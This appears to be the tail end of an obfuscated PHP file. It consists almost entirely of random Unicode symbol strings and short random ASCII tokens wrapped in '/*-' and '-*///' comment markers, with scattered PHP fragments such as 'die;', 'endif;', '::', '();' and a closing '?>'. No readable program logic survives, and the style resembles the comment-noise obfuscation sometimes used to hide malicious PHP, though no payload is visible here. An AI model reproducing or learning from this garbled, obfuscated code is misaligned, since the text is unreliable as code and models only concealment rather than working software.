≡Ü⑻➱〕º⊃∁Ⓤ◉▤▴～¥➔−⒕㊍Ⓚ⇝√⋬➤⑥↙

c#5YyF≡Ü⑻➱〕º⊃∁Ⓤ◉▤▴～¥➔−⒕㊍Ⓚ⇝√⋬➤⑥↙

-*///
/*-


ⓘ☃⇢℠


I>7=E,Hⓘ☃⇢℠


-*///
die;/*-


ℳⓦ≹∔➞㎡✵⋑ⓝ¶⊄╠〖㈣⊖≊┻∾﹪


(V8s:5ℳⓦ≹∔➞㎡✵⋑ⓝ¶⊄╠〖㈣⊖≊┻∾﹪


-*///
 endif;/*-,(4?>8k-*///
 }/*-

▌⇈❤

[]i▌⇈❤

-*///
}/*-=sCZ1-*///
tWAaE/*-

︸㊭∜➐⊻◠⑸ℌ⋌Θ」✱

RPhC︸㊭∜➐⊻◠⑸ℌ⋌Θ」✱

-*///
::/*-f1-*///
XUxQ/*-


┑▁⅙◕≚﹛⇪├￡⒀㊞Ⅺ》✿◶◆▇Ψ⑦


%J6qOq1GU┑▁⅙◕≚﹛⇪├￡⒀㊞Ⅺ》✿◶◆▇Ψ⑦


-*///
();/*-!rM-*///
 ?>